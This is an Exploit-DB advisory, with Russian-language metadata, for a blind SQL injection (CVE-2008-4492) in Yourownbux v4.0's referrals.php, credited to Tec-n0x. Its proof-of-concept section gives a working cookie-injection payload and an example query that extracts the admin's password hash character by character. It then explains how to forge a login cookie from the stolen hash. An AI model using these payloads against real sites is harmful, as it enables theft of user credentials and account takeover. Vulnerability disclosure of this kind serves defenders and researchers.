- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6693
- Проверка EDB
-
- Пройдено
- Автор
- TEC-N0X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4492
- Дата публикации
- 2008-10-07
Код:
________ ._.
\______ \_______ ____ ______ ______ ____ ____ | |
| | \_ __ \/ _ \\____ \/ ___// __ \_/ ___\ | |
| ` \ | \( <_> ) |_> >___ \\ ___/\ \___ \|
/_______ /__| \____/| __/____ >\___ >\___ > __
\/ |__| \/ \/ \/ \/
.____ ___.
| | _____ \_ |__ ______
| | \__ \ | __ \ / ___/
| |___ / __ \| \_\ \\___ \
|_______ (____ /___ /____ >
\/ \/ \/ \/
---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )
-----[]===========[]=> Discovered By: Tec-n0x
Contact: Tec-n0x <at> hotmail <dot> com
-----[]===========[]=> DropSec.com =~ Lab's ..!!
-----[]===========[]=> Gr33tz:
Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends
Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )
---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
POC:
Go to => http://site.com/referrals.php ( Logged in )
javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";
=> Modify : ' AND 1=0 /* With Injection's.
=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ]
and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).
---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
# milw0rm.com [2008-10-07]
- Источник
- www.exploit-db.com